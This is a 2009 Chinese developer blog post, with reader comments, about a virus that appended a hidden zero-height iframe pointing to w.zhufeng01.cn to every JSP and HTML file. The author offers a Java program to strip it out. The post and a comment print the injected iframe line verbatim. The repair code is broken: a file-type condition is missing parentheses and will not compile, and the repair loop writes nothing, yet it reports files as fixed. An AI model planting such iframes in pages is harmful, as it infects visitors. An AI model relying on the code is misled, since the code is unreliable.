冷面阎罗

低调做人&&高调做事
随笔 - 208, 文章 - 3, 评论 - 593, 引用 - 0
数据加载中……

中了一个很奇怪的病毒,所有的jsp文件均为改写

      上周末,机器中毒了,起初自己没有发现,后来写代码发现运行jsp文件,机器变的奇慢务必,后来以为是机器慢,就把qq、msn 等工具全关掉了,发现还是不行,后来把上网的代理关掉时候发现正常了;再一看jsp文件发现全部被改写了,在文件最后一行加上
<iframe src=http://w.zhufeng01.cn/a.htm width=100 height=0></iframe>
      于是上网找杀毒软件,刚开始用的诺顿(公式规定必须安装),发现不行就换别的软件,可是病毒不让你安装别的杀毒软件,甚至打开有解决方法的网页,都会将ie关闭。
 
     后来同事给了360,算是把病毒稳定了,可是我的jsp、html文件都被改写了,这时想到写程序解决,下面是我弄的java程序删除文件中被增加的iframe。
import java.io.File;
import java.io.RandomAccessFile;

public class RepairPage
{

    private static int num;

    private String worm = "<iframe src=http://w.zhufeng01.cn/a.htm width=100 height=0></iframe>";

    public void repair(File page)
    {
        //System.out.println("Try File:"+page.getPath());
        try
        {
            RandomAccessFile r = new RandomAccessFile(page, "rw");
            if (r.length() < 68)
                return;
            r.seek(r.length() - 68);//跳到最后一行
            String shit = r.readLine();
            if (shit.equals(worm))
            {
                //System.out.println("shit content:"+shit);
                System.out.println("修复损坏文件:" + page.getPath());
                r.seek(r.length() - 68);
                for (int i = 0; i < worm.length(); i++)
                {
                    r.writeBytes("");
                }
                num++;
            }
        }
        catch (Exception e)
        {
            e.printStackTrace();
        }
    }

    public void doDir(File dir)
    {
        if (dir.canRead())
        {
            if (dir.isDirectory())
            {
                String[] files = dir.list();
                if (files != null)
                {
                    for (int i = 0; i < files.length; i++)
                    {
                        doDir(new File(dir, files[i]));// 递归
                    }
                }
            }
            else
            {// is File
                String name = dir.getName();
                if (name.endsWith("jsp"|| name.endsWith("html"|| name.endsWith("htm"))
                    repair(dir);
            }
        }
    }

    public static void main(String[] args)
    {

        File dir = new File("E://program//guizhou//09检试源码//web//");
        RepairPage repair = new RepairPage();
        repair.doDir(dir);
        System.out.println("修复成功完成,修复文件数:" + repair.num);
    }

}

posted on 2009-02-17 10:49 冷面阎罗 阅读(1262) 评论(8)  编辑  收藏

评论

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写[未登录]  回复  更多评论   

恩,我也中过这个病毒。我中的时候每个网页的iframe里面src的值都不一样的。
2009-02-17 11:35 | haha

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

我现在中的就是这个毒但是用360还是杀不了病毒。
360发现没有病毒,但是用vs新建一个网页文件他又会在最后面加上这个<iframe src=http://w.zhufeng01.cn/a.htm width=100 height=0></iframe>
2009-02-18 10:06 | bigeng

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

操,不会CVS重新down一份么?
2009-02-18 10:19 | hdware

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

呵呵,碰到过,硬改代码恢复的,痛苦
2009-02-18 14:07 | jeasonzhao

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写[未登录]  回复  更多评论   

妈的,上千页面都有这个代码,惨啊,怎么改啊
2009-02-20 10:45 | dd

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

也中标了,而且这个shit还在压缩文件里面加了一个病毒文件"安装.bat".
另外请问下500错误之类的错误信息页面在哪个文件夹下面?或者是动态生成的?
2009-02-23 15:55 | tt

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

哦.另外问下你这个程序是在什么环境下运行的?
还有好象这个病毒下载的东西把host文件也给改了,把杀软的网址全指向本地,并且来了一句以下为恶意网站,杀了毒之后系统蓝屏,这两天真被弄死了
2009-02-23 16:00 | tt

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

这是ARP病毒,
2010-05-15 14:06 | asfd

只有注册用户登录后才能发表评论。
网站导航: